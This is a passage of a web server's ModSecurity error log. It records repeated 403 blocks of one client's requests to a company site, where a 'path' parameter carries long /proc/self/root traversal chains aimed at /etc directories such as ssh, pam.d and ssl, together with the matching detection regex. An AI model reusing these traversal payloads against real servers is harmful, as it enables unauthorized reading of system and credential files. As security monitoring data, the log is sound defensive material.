"abzwabninkcc-iUj5Aov7AAAA4U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:55.163195 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:45592] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwa_XLqtnMIWvjpaJrpQAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:56.456881 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:45608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwbPqxLDW4GITHUkS0bAAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:58.852122 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.243.128:45622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwbvHIg5MgXLBnicPONgAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:00.232141 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.243.128:38000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwcPHIg5MgXLBnicPOOAAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:01.854613 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.243.128:38004] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwcfHIg5MgXLBnicPOPAAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:07.359955 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:38014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwd_XLqtnMIWvjpaJrrgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:10.131546 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.243.128:46962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwegF0L0L-SsrnPo46wgAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:11.728713 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:46972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwe9a6ubjKNq_cu4ahWAAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:13.718950 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.243.128:46980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwffXLqtnMIWvjpaJrtwAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:15.168199 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:46996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwf-oXxyEfFpUF8f9WUAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:16.483284 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:47010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwgNa6ubjKNq_cu4ahXAAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:17.824243 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:47012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwgda6ubjKNq_cu4ahYQAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:20.215055 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.243.128:47016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwhPXLqtnMIWvjpaJrwQAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:21.515347 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:42298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwhRCii7xarUs8iHY3EgAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:22.833222 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.243.128:42302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwhvHIg5MgXLBnicPORQAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:24.118999 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:42316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwiPqxLDW4GITHUkS0dgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:26.338754 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:42330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwida6ubjKNq_cu4ahZwAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:27.763229 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:42338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwizJ3M9BSuKP7CAbi5gAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:29.095762 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:42352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwjda6ubjKNq_cu4ahbAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:30.447724 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:45430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwjvHIg5MgXLBnicPOTAAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:00:31.791434 2026] [:error] [pid 31215:tid 140411574073088] [client 74.7.243.128:45432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwjwF0L0L-SsrnPo46zAAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
